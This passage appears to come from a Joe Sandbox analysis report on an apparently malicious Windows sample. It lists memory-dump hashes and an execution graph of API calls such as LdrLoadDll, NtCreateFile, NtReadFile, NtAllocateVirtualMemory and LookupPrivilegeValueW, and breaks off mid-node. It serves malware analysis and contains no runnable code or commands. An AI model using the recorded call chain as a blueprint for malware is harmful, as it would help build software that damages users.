                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02859976
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: fae0d35510b599add5d09a805fb5adbeedc00c2e95d881d0751fcba21184e05b
                                            • Instruction ID: d30b3f44e388f946e550f3eb1468ab34259456cfa0a1119d586d64422d181a57
                                            • Opcode Fuzzy Hash: fae0d35510b599add5d09a805fb5adbeedc00c2e95d881d0751fcba21184e05b
                                            • Instruction Fuzzy Hash: 5E1113B5C002498FCB10CF9AC484BDEFBF4AF88324F10842AD859B7600C378A545CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331731538.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_dcd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f318b2fdb477ff1564a4823e627ca45633ddc88757d24a815413383b45efb0da
                                            • Instruction ID: d0b0d8d34cef1cc5b28abaf03bd0f442209cedc1d65ffa8c687367c595527b2d
                                            • Opcode Fuzzy Hash: f318b2fdb477ff1564a4823e627ca45633ddc88757d24a815413383b45efb0da
                                            • Instruction Fuzzy Hash: 3221FFB2504241EFDB05DF14D9C0F26BF66FB88328F24867DE8450B246C336E846DAB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331767965.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ddd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b4a5949a51a33f2569bcd5eabe5cc5c7a43bc98415c79281881c79748ef731c
                                            • Instruction ID: c547dc21984c3cf4ce25b0b0bee58c20ca69d293820c374e5adf0aeecada0fda
                                            • Opcode Fuzzy Hash: 9b4a5949a51a33f2569bcd5eabe5cc5c7a43bc98415c79281881c79748ef731c
                                            • Instruction Fuzzy Hash: BD21D075604240DFDF15DF24D9C0B26BBA6FB88324F24CA6AE84A4B346C336D847DA71
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331767965.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ddd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d49e501fd6e41d5103823965f5685fbf2c665db4cfca6c762eac28ce0efb11d
                                            • Instruction ID: b9e4be71a59dbc441d5dcd5cb698c2ae49cfd8e6473b5cfc505faf1fb6a66acd
                                            • Opcode Fuzzy Hash: 8d49e501fd6e41d5103823965f5685fbf2c665db4cfca6c762eac28ce0efb11d
                                            • Instruction Fuzzy Hash: C2212271504240EFDF01CF14D9C0B26BFA6FB84314F24CA6AE8894B346C336D846DA71
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331767965.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ddd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 713886fb83a96ce30d8eae55b02d656b459f8b60be7592fc6bdd783dce321d62
                                            • Instruction ID: 91880dfc2eac98852c187fd84af6871c2a2ab2cd07971ac177a843e9fb334e08
                                            • Opcode Fuzzy Hash: 713886fb83a96ce30d8eae55b02d656b459f8b60be7592fc6bdd783dce321d62
                                            • Instruction Fuzzy Hash: 8B217F755093808FCB12CF24D990715BF71AB86314F29C5EBD8498B697C33A980ACB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331731538.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_dcd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                            • Instruction ID: 9edc69176531f47acbe29ce8510860116a6a4466ba6cdc79ba4bb4e7d301ad7a
                                            • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                            • Instruction Fuzzy Hash: 8011B176504281CFCB16CF14D9C4B16BF72FB84324F28C6ADD8450B656C336D856CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331767965.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ddd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                            • Instruction ID: d0be65027de224b28872e55730139660efbbe3ad509044edd67fd12c88cc6ed1
                                            • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                            • Instruction Fuzzy Hash: 18117975904280DFDB16CF14D5C4B15BFA2FB84324F28C6AAD8494B756C33AD84ACB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331731538.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_dcd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 97577d9f97f8deff3f417b9ea0e8f93f12854b56ac4bc75210d3a4df4f8130d2
                                            • Instruction ID: 1b6399a6e48adab370f6609a00749fd87657b15082b64eb38dcd64f20d4e8048
                                            • Opcode Fuzzy Hash: 97577d9f97f8deff3f417b9ea0e8f93f12854b56ac4bc75210d3a4df4f8130d2
                                            • Instruction Fuzzy Hash: D501D431508381AAE7204E15CC84F66BB98EF41734F18852EE9461B6C2C378D845DAB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331731538.0000000000DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DCD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_dcd000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c20b2c0e9868b4f87a9283de8d1b8e01e4857f2b67428933456af519cd0c984
                                            • Instruction ID: e8eda3b70ad3bfa57f9c0b65890ad690093ee1d9962f94217fe452df5f73328b
                                            • Opcode Fuzzy Hash: 2c20b2c0e9868b4f87a9283de8d1b8e01e4857f2b67428933456af519cd0c984
                                            • Instruction Fuzzy Hash: 2CF06271504244AEEB208E15CCC4B62FF98EB95734F18C56EED095F6C6C3799C44CAB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e1763850bb4c00d76c0a0bca71be6efc05cb95af41d8aa448c526844ba01bac
                                            • Instruction ID: 86acd0d393696539b5bda5406e91faa415358c1d39a0de82e89cfdeed1055548
                                            • Opcode Fuzzy Hash: 2e1763850bb4c00d76c0a0bca71be6efc05cb95af41d8aa448c526844ba01bac
                                            • Instruction Fuzzy Hash: 9612E8F9C817468BE310CF25E89C289BB61F745328BD04A28D9652BAD0D7BC917ECF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dfcdff5744b14dea84aa26ca0c3489af8dcb159be63c642af1455af6ae861568
                                            • Instruction ID: 36e69314c602530f77d91c3230c3f15de6c1eff460afe273cba7b76439ac2dcd
                                            • Opcode Fuzzy Hash: dfcdff5744b14dea84aa26ca0c3489af8dcb159be63c642af1455af6ae861568
                                            • Instruction Fuzzy Hash: D1A14C3AE00229CFCF05DFA9C84459EBBB3FF85305B15856AE905EB261DB31A955CF40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.331997826.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Offset: 02850000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2850000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 135526a27c0f0c60fbd24d67f7c3e6057ff307849eca742081065ce8bc52ea2f
                                            • Instruction ID: 802087919271294fbaff19f200472a98bdb61c41bc2621688c713d7d397ccbbb
                                            • Opcode Fuzzy Hash: 135526a27c0f0c60fbd24d67f7c3e6057ff307849eca742081065ce8bc52ea2f
                                            • Instruction Fuzzy Hash: 26C13AB9C917068BE310DF25E88C289BB71FB45324F904A28D9612B6D0D7BCA07ECF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:3.8%
                                            Dynamic/Decrypted Code Coverage:2.7%
                                            Signature Coverage:5.8%
                                            Total number of Nodes:550
                                            Total number of Limit Nodes:73
                                            execution_graph 34808 41f090 34809 41f09b 34808->34809 34811 41b970 34808->34811 34812 41b996 34811->34812 34819 409d40 34812->34819 34814 41b9a2 34818 41b9c3 34814->34818 34827 40c1c0 34814->34827 34816 41b9b5 34863 41a6b0 34816->34863 34818->34809 34866 409c90 34819->34866 34821 409d4d 34822 409d54 34821->34822 34878 409c30 34821->34878 34822->34814 34828 40c1e5 34827->34828 35290 40b1c0 34828->35290 34830 40c23c 35294 40ae40 34830->35294 34832 40c4b3 34832->34816 34833 40c262 34833->34832 35303 4143a0 34833->35303 34835 40c2a7 34835->34832 35306 408a60 34835->35306 34837 40c2eb 34837->34832 35313 41a500 34837->35313 34841 40c341 34842 40c348 34841->34842 35325 41a010 34841->35325 34843 41bdc0 2 API calls 34842->34843 34845 40c355 34843->34845 34845->34816 34847 40c392 34848 41bdc0 2 API calls 34847->34848 34849 40c399 34848->34849 34849->34816 34850 40c3a2 34851 40f4a0 3 API calls 34850->34851 34852 40c416 34851->34852 34852->34842 34853 40c421 34852->34853 34854 41bdc0 2 API calls 34853->34854 34855 40c445 34854->34855 35330 41a060 34855->35330 34858 41a010 2 API calls 34859 40c480 34858->34859 34859->34832 35335 419e20 34859->35335 34862 41a6b0 2 API calls 34862->34832 34864 41a6cf ExitProcess 34863->34864 34865 41af60 LdrLoadDll 34863->34865 34865->34864 34867 409ca3 34866->34867 34917 418bc0 LdrLoadDll 34866->34917 34897 418a70 34867->34897 34870 409cb6 34870->34821 34871 409cac 34871->34870 34900 41b2b0 34871->34900 34873 409cf3 34873->34870 34911 409ab0 34873->34911 34875 409d13 34918 409620 LdrLoadDll 34875->34918 34877 409d25 34877->34821 34879 409c4a 34878->34879 34880 41b5a0 LdrLoadDll 34878->34880 35269 41b5a0 34879->35269 34880->34879 34883 41b5a0 LdrLoadDll 34884 409c71 34883->34884 34885 40f180 34884->34885 34886 40f199 34885->34886 34887 40f1ac 34886->34887 35288 40b040 LdrLoadDll 34886->35288 35277 41a1e0 34887->35277 34892 40f1d2 34893 40f1fd 34892->34893 35283 41a260 34892->35283 34895 41a490 2 API calls 34893->34895 34896 409d65 34895->34896 34896->34814 34919 41a600 34897->34919 34901 41b2c9 34900->34901 34932 414a50 34901->34932 34903 41b2e1 34904 41b2ea 34903->34904 34971 41b0f0 34903->34971 34904->34873 34906 41b2fe 34906->34904 34989 419f00 34906->34989 34914 409aca 34911->34914 35247 407ea0 34911->35247 34913 409ad1 34913->34875 34914->34913 35260 408160 34914->35260 34917->34867 34918->34877 34921 418a85 34919->34921 34922 41af60 34919->34922 34921->34871 34923 41af70 34922->34923 34925 41af92 34922->34925 34926 414e50 34923->34926 34925->34921 34927 414e5e 34926->34927 34928 414e6a 34926->34928 34927->34928 34931 4152d0 LdrLoadDll 34927->34931 34928->34925 34930 414fbc 34930->34925 34931->34930 34933 414d85 34932->34933 34934 414a64 34932->34934 34933->34903 34934->34933 34997 419c50 34934->34997 34937 414b90 35000 41a360 34937->35000 34938 414b73 35057 41a460 LdrLoadDll 34938->35057 34941 414bb7 34943 41bdc0 2 API calls 34941->34943 34942 414b7d 34942->34903 34944 414bc3 34943->34944 34944->34942 34945 414d49 34944->34945 34946 414d5f 34944->34946 34951 414c52 34944->34951 34947 41a490 2 API calls 34945->34947 35066 414790 LdrLoadDll NtReadFile NtClose 34946->35066 34949 414d50 34947->34949 34949->34903 34950 414d72 34950->34903 34952 414cb9 34951->34952 34954 414c61 34951->34954 34952->34945 34953 414ccc 34952->34953 35059 41a2e0 34953->35059 34956 414c66 34954->34956 34957 414c7a 34954->34957 35058 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34956->35058 34960 414c97 34957->34960 34961 414c7f 34957->34961 34960->34949 35015 414410 34960->35015 35003 4146f0 34961->35003 34963 414c70 34963->34903 34966 414d2c 35063 41a490 34966->35063 34967 414c8d 34967->34903 34968 414caf 34968->34903 34970 414d38 34970->34903 34972 41b101 34971->34972 34973 41b113 34972->34973 35084 41bd40 34972->35084 34973->34906 34975 41b134 35087 414070 34975->35087 34977 41b180 34977->34906 34978 41b157 34978->34977 34979 414070 3 API calls 34978->34979 34982 41b179 34979->34982 34981 41b20a 34983 41b21a 34981->34983 35213 41af00 LdrLoadDll 34981->35213 34982->34977 35119 415390 34982->35119 35129 41ad70 34983->35129 34986 41b248 35208 419ec0 34986->35208 34990 419f1c 34989->34990 34991 41af60 LdrLoadDll 34989->34991 35241 104967a 34990->35241 34991->34990 34992 419f37 34994 41bdc0 34992->34994 35244 41a670 34994->35244 34996 41b359 34996->34873 34998 414b44 34997->34998 34999 41af60 LdrLoadDll 34997->34999 34998->34937 34998->34938 34998->34942 34999->34998 35001 41a37c NtCreateFile 35000->35001 35002 41af60 LdrLoadDll 35000->35002 35001->34941 35002->35001 35004 41470c 35003->35004 35005 41a2e0 LdrLoadDll 35004->35005 35006 41472d 35005->35006 35007 414734 35006->35007 35008 414748 35006->35008 35009 41a490 2 API calls 35007->35009 35010 41a490 2 API calls 35008->35010 35011 41473d 35009->35011 35012 414751 35010->35012 35011->34967 35067 41bfd0 LdrLoadDll RtlAllocateHeap 35012->35067 35014 41475c 35014->34967 35016 41445b 35015->35016 35017 41448e 35015->35017 35019 41a2e0 LdrLoadDll 35016->35019 35018 4145d9 35017->35018 35022 4144aa 35017->35022 35020 41a2e0 LdrLoadDll 35018->35020 35021 414476 35019->35021 35027 4145f4 35020->35027 35023 41a490 2 API calls 35021->35023 35024 41a2e0 LdrLoadDll 35022->35024 35025 41447f 35023->35025 35026 4144c5 35024->35026 35025->34968 35029 4144e1 35026->35029 35030 4144cc 35026->35030 35080 41a320 LdrLoadDll 35027->35080 35033 4144e6 35029->35033 35034 4144fc 35029->35034 35032 41a490 2 API calls 35030->35032 35031 41462e 35035 41a490 2 API calls 35031->35035 35036 4144d5 35032->35036 35037 41a490 2 API calls 35033->35037 35043 414501 35034->35043 35068 41bf90 35034->35068 35038 414639 35035->35038 35036->34968 35039 4144ef 35037->35039 35038->34968 35039->34968 35040 414513 35040->34968 35043->35040 35071 41a410 35043->35071 35044 414567 35049 41457e 35044->35049 35079 41a2a0 LdrLoadDll 35044->35079 35046 414585 35050 41a490 2 API calls 35046->35050 35047 41459a 35048 41a490 2 API calls 35047->35048 35051 4145a3 35048->35051 35049->35046 35049->35047 35050->35040 35052 4145cf 35051->35052 35074 41bb90 35051->35074 35052->34968 35054 4145ba 35055 41bdc0 2 API calls 35054->35055 35056 4145c3 35055->35056 35056->34968 35057->34942 35058->34963 35060 414d14 35059->35060 35061 41af60 LdrLoadDll 35059->35061 35062 41a320 LdrLoadDll 35060->35062 35061->35060 35062->34966 35064 41af60 LdrLoadDll 35063->35064 35065 41a4ac NtClose 35064->35065 35065->34970 35066->34950 35067->35014 35070 41bfa8 35068->35070 35081 41a630 35068->35081 35070->35043 35072 41af60 LdrLoadDll 35071->35072 35073 41a42c NtReadFile 35072->35073 35073->35044 35075 41bbb4 35074->35075 35076 41bb9d 35074->35076 35075->35054 35076->35075 35077 41bf90 2 API calls 35076->35077 35078 41bbcb 35077->35078 35078->35054 35079->35049 35080->35031 35082 41af60 LdrLoadDll 35081->35082 35083 41a64c RtlAllocateHeap 35082->35083 35083->35070 35214 41a540 35084->35214 35086 41bd6d 35086->34975 35088 414081 35087->35088 35089 414089 35087->35089 35088->34978 35118 41435c 35089->35118 35217 41cf30 35089->35217 35091 4140dd 35092 41cf30 2 API calls 35091->35092 35095 4140e8 35092->35095 35093 414136 35096 41cf30 2 API calls 35093->35096 35095->35093 35097 41d060 3 API calls 35095->35097 35228 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 35095->35228 35099 41414a 35096->35099 35097->35095 35098 4141a7 35100 41cf30 2 API calls 35098->35100 35099->35098 35222 41d060 35099->35222 35101 4141bd 35100->35101 35103 4141fa 35101->35103 35105 41d060 3 API calls 35101->35105 35104 41cf30 2 API calls 35103->35104 35106 414205 35104->35106 35105->35101 35107 41423f 35106->35107 35108 41d060 3 API calls 35106->35108 35229 41cf90 LdrLoadDll RtlFreeHeap 35107->35229 35108->35106 35110 414334 35230 41cf90 LdrLoadDll RtlFreeHeap 35110->35230 35112 41433e 35231 41cf90 LdrLoadDll RtlFreeHeap 35112->35231 35114 414348 35232 41cf90 LdrLoadDll RtlFreeHeap 35114->35232 35116 414352 35233 41cf90 LdrLoadDll RtlFreeHeap 35116->35233 35118->34978 35120 4153a1 35119->35120 35121 414a50 8 API calls 35120->35121 35123 4153b7 35121->35123 35122 41540a 35122->34981 35123->35122 35124 4153f2 35123->35124 35125 415405 35123->35125 35126 41bdc0 2 API calls 35124->35126 35127 41bdc0 2 API calls 35125->35127 35128 4153f7 35126->35128 35127->35122 35128->34981 35234 41ac30 35129->35234 35132 41ac30 LdrLoadDll 35133 41ad8d 35132->35133 35134 41ac30 LdrLoadDll 35133->35134 35135 41ad96 35134->35135 35136 41ac30 LdrLoadDll 35135->35136 35137 41ad9f 35136->35137 35138 41ac30 LdrLoadDll 35137->35138 35139 41ada8 35138->35139 35140 41ac30 LdrLoadDll 35139->35140 35141 41adb1 35140->35141 35142 41ac30 LdrLoadDll 35141->35142 35143 41adbd 35142->35143 35144 41ac30 LdrLoadDll 35143->35144 35145 41adc6 35144->35145 35146 41ac30 LdrLoadDll 35145->35146 35147 41adcf 35146->35147 35148 41ac30 LdrLoadDll 35147->35148 35149 41add8 35148->35149 35150 41ac30 LdrLoadDll 35149->35150 35151 41ade1 35150->35151 35152 41ac30 LdrLoadDll 35151->35152 35153 41adea 35152->35153 35154 41ac30 LdrLoadDll 35153->35154 35155 41adf6 35154->35155 35156 41ac30 LdrLoadDll 35155->35156 35157 41adff 35156->35157 35158 41ac30 LdrLoadDll 35157->35158 35159 41ae08 35158->35159 35160 41ac30 LdrLoadDll 35159->35160 35161 41ae11 35160->35161 35162 41ac30 LdrLoadDll 35161->35162 35163 41ae1a 35162->35163 35164 41ac30 LdrLoadDll 35163->35164 35165 41ae23 35164->35165 35166 41ac30 LdrLoadDll 35165->35166 35167 41ae2f 35166->35167 35168 41ac30 LdrLoadDll 35167->35168 35169 41ae38 35168->35169 35170 41ac30 LdrLoadDll 35169->35170 35171 41ae41 35170->35171 35172 41ac30 LdrLoadDll 35171->35172 35173 41ae4a 35172->35173 35174 41ac30 LdrLoadDll 35173->35174 35175 41ae53 35174->35175 35176 41ac30 LdrLoadDll 35175->35176 35177 41ae5c 35176->35177 35178 41ac30 LdrLoadDll 35177->35178 35179 41ae68 35178->35179 35180 41ac30 LdrLoadDll 35179->35180 35181 41ae71 35180->35181 35182 41ac30 LdrLoadDll 35181->35182 35183 41ae7a 35182->35183 35184 41ac30 LdrLoadDll 35183->35184 35185 41ae83 35184->35185 35186 41ac30 LdrLoadDll 35185->35186 35187 41ae8c 35186->35187 35188 41ac30 LdrLoadDll 35187->35188 35189 41ae95 35188->35189 35190 41ac30 LdrLoadDll 35189->35190 35191 41aea1 35190->35191 35192 41ac30 LdrLoadDll 35191->35192 35193 41aeaa 35192->35193 35194 41ac30 LdrLoadDll 35193->35194 35195 41aeb3 35194->35195 35196 41ac30 LdrLoadDll 35195->35196 35197 41aebc 35196->35197 35198 41ac30 LdrLoadDll 35197->35198 35199 41aec5 35198->35199 35200 41ac30 LdrLoadDll 35199->35200 35201 41aece 35200->35201 35202 41ac30 LdrLoadDll 35201->35202 35203 41aeda 35202->35203 35204 41ac30 LdrLoadDll 35203->35204 35205 41aee3 35204->35205 35206 41ac30 LdrLoadDll 35205->35206 35207 41aeec 35206->35207 35207->34986 35209 41af60 LdrLoadDll 35208->35209 35210 419edc 35209->35210 35240 1049860 LdrInitializeThunk 35210->35240 35211 419ef3 35211->34906 35213->34983 35215 41af60 LdrLoadDll 35214->35215 35216 41a55c NtAllocateVirtualMemory 35215->35216 35216->35086 35218 41cf40 35217->35218 35219 41cf46 35217->35219 35218->35091 35220 41bf90 2 API calls 35219->35220 35221 41cf6c 35220->35221 35221->35091 35223 41cfd0 35222->35223 35224 41d00a 35223->35224 35225 41bf90 2 API calls 35223->35225 35226 41d02d 35223->35226 35227 41bdc0 2 API calls 35224->35227 35225->35224 35226->35099 35227->35226 35228->35095 35229->35110 35230->35112 35231->35114 35232->35116 35233->35118 35235 41ac4b 35234->35235 35236 414e50 LdrLoadDll 35235->35236 35237 41ac6b 35236->35237 35238 414e50 LdrLoadDll 35237->35238 35239 41ad17 35237->35239 35238->35239 35239->35132 35240->35211 35242 1049681 35241->35242 35243 104968f LdrInitializeThunk 35241->35243 35242->34992 35243->34992 35245 41af60 LdrLoadDll 35244->35245 35246 41a68c RtlFreeHeap 35245->35246 35246->34996 35248 407eb0 35247->35248 35249 407eab 35247->35249 35250 41bd40 2 API calls 35248->35250 35249->34914 35256 407ed5 35250->35256 35251 407f38 35251->34914 35252 419ec0 2 API calls 35252->35256 35253 407f3e 35255 407f64 35253->35255 35257 41a5c0 2 API calls 35253->35257 35255->34914 35256->35251 35256->35252 35256->35253 35258 41bd40 2 API calls 35256->35258 35263 41a5c0 35256->35263 35259 407f55 35257->35259 35258->35256 35259->34914 35261 41a5c0 2 API calls 35260->35261 35262 40817e 35261->35262 35262->34875 35264 41af60 LdrLoadDll 35263->35264 35265 41a5dc 35264->35265 35268 10496e0 LdrInitializeThunk 35265->35268 35266 41a5f3 35266->35256 35268->35266 35270 41b5c3 35269->35270 35273 40acf0 35270->35273 35274 40ad14 35273->35274 35275 409c5b 35274->35275 35276 40ad50 LdrLoadDll 35274->35276 35275->34883 35276->35275 35278 41af60 LdrLoadDll 35277->35278 35279 40f1bb 35278->35279 35279->34896 35280 41a7d0 35279->35280 35281 41a7ef LookupPrivilegeValueW 35280->35281 35282 41af60 LdrLoadDll 35280->35282 35281->34892 35282->35281 35284 41a27c 35283->35284 35285 41af60 LdrLoadDll 35283->35285 35289 1049910 LdrInitializeThunk 35284->35289 35285->35284 35286 41a29b 35286->34893 35288->34887 35289->35286 35291 40b1f0 35290->35291 35340 40b040 LdrLoadDll 35291->35340 35293 40b204 35293->34830 35295 40ae51 35294->35295 35296 40ae4d 35294->35296 35297 40ae9c 35295->35297 35299 40ae6a 35295->35299 35296->34833 35342 419cd0 LdrLoadDll 35297->35342 35341 419cd0 LdrLoadDll 35299->35341 35300 40aead 35300->34833 35302 40ae8c 35302->34833 35304 40f4a0 3 API calls 35303->35304 35305 4143c6 35303->35305 35304->35305 35305->34835 35343 4087a0 35306->35343 35309 408a9d 35309->34837 35310 4087a0 19 API calls 35311 408a8a 35310->35311 35311->35309 35361 40f710 10 API calls 35311->35361 35314 41af60 LdrLoadDll 35313->35314 35315 41a51c 35314->35315 35480 10498f0 LdrInitializeThunk 35315->35480 35316 40c322 35318 40f4a0 35316->35318 35319 40f4bd 35318->35319 35481 419fc0 35319->35481 35322 40f505 35322->34841 35323 41a010 2 API calls 35324 40f52e 35323->35324 35324->34841 35326 41af60 LdrLoadDll 35325->35326 35327 41a02c 35326->35327 35487 1049780 LdrInitializeThunk 35327->35487 35328 40c385 35328->34847 35328->34850 35331 41af60 LdrLoadDll 35330->35331 35332 41a07c 35331->35332 35488 10497a0 LdrInitializeThunk 35332->35488 35333 40c459 35333->34858 35336 41af60 LdrLoadDll 35335->35336 35337 419e3c 35336->35337 35489 1049a20 LdrInitializeThunk 35337->35489 35338 40c4ac 35338->34862 35340->35293 35341->35302 35342->35300 35344 407ea0 4 API calls 35343->35344 35359 4087ba 35343->35359 35344->35359 35345 408a49 35345->35309 35345->35310 35346 408a3f 35347 408160 2 API calls 35346->35347 35347->35345 35350 419f00 2 API calls 35350->35359 35352 41a490 LdrLoadDll NtClose 35352->35359 35355 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 35355->35359 35358 419e20 2 API calls 35358->35359 35359->35345 35359->35346 35359->35350 35359->35352 35359->35355 35359->35358 35362 419d10 35359->35362 35365 4085d0 35359->35365 35377 40f5f0 LdrLoadDll NtClose 35359->35377 35378 419d90 LdrLoadDll 35359->35378 35379 419dc0 LdrLoadDll 35359->35379 35380 419e50 LdrLoadDll 35359->35380 35381 4083a0 35359->35381 35397 405f60 LdrLoadDll 35359->35397 35361->35309 35363 419d2c 35362->35363 35364 41af60 LdrLoadDll 35362->35364 35363->35359 35364->35363 35366 4085e6 35365->35366 35398 419880 35366->35398 35368 4085ff 35373 408771 35368->35373 35419 4081a0 35368->35419 35370 4086e5 35371 4083a0 11 API calls 35370->35371 35370->35373 35372 408713 35371->35372 35372->35373 35374 419f00 2 API calls 35372->35374 35373->35359 35375 408748 35374->35375 35375->35373 35376 41a500 2 API calls 35375->35376 35376->35373 35377->35359 35378->35359 35379->35359 35380->35359 35382 4083c9 35381->35382 35459 408310 35382->35459 35385 41a500 2 API calls 35386 4083dc 35385->35386 35386->35385 35387 408467 35386->35387 35389 408462 35386->35389 35467 40f670 35386->35467 35387->35359 35388 41a490 2 API calls 35390 40849a 35388->35390 35389->35388 35390->35387 35391 419d10 LdrLoadDll 35390->35391 35392 4084ff 35391->35392 35392->35387 35471 419d50 35392->35471 35394 408563 35394->35387 35395 414a50 8 API calls 35394->35395 35396 4085b8 35395->35396 35396->35359 35397->35359 35399 41bf90 2 API calls 35398->35399 35400 419897 35399->35400 35426 409310 35400->35426 35402 4198b2 35403 4198f0 35402->35403 35404 4198d9 35402->35404 35406 41bd40 2 API calls 35403->35406 35405 41bdc0 2 API calls 35404->35405 35407 4198e6 35405->35407 35408 41992a 35406->35408 35407->35368 35409 41bd40 2 API calls 35408->35409 35410 419943 35409->35410 35416 419be4 35410->35416 35432 41bd80 35410->35432 35413 419bd0 35414 41bdc0 2 API calls 35413->35414 35415 419bda 35414->35415 35415->35368 35417 41bdc0 2 API calls 35416->35417 35418 419c39 35417->35418 35418->35368 35420 40829f 35419->35420 35421 4081b5 35419->35421 35420->35370 35421->35420 35422 414a50 8 API calls 35421->35422 35424 408222 35422->35424 35423 408249 35423->35370 35424->35423 35425 41bdc0 2 API calls 35424->35425 35425->35423 35427 409335 35426->35427 35428 40acf0 LdrLoadDll 35427->35428 35429 409368 35428->35429 35430 40938d 35429->35430 35435 40cf20 35429->35435 35430->35402 35453 41a580 35432->35453 35436 40cf4c 35435->35436 35437 41a1e0 LdrLoadDll 35436->35437 35438 40cf65 35437->35438 35439 40cf6c 35438->35439 35446 41a220 35438->35446 35439->35430 35443 40cfa7 35444 41a490 2 API calls 35443->35444 35445 40cfca 35444->35445 35445->35430 35447 41a23c 35446->35447 35448 41af60 LdrLoadDll 35446->35448 35452 1049710 LdrInitializeThunk 35447->35452 35448->35447 35449 40cf8f 35449->35439 35451 41a810 LdrLoadDll 35449->35451 35451->35443 35452->35449 35454 41af60 LdrLoadDll 35453->35454 35455 41a59c 35454->35455 35458 1049a00 LdrInitializeThunk 35455->35458 35456 419bc9 35456->35413 35456->35416 35458->35456 35460 408328 35459->35460 35461 40acf0 LdrLoadDll 35460->35461 35462 408343 35461->35462 35463 414e50 LdrLoadDll 35462->35463 35464 408353 35463->35464 35465 40835c 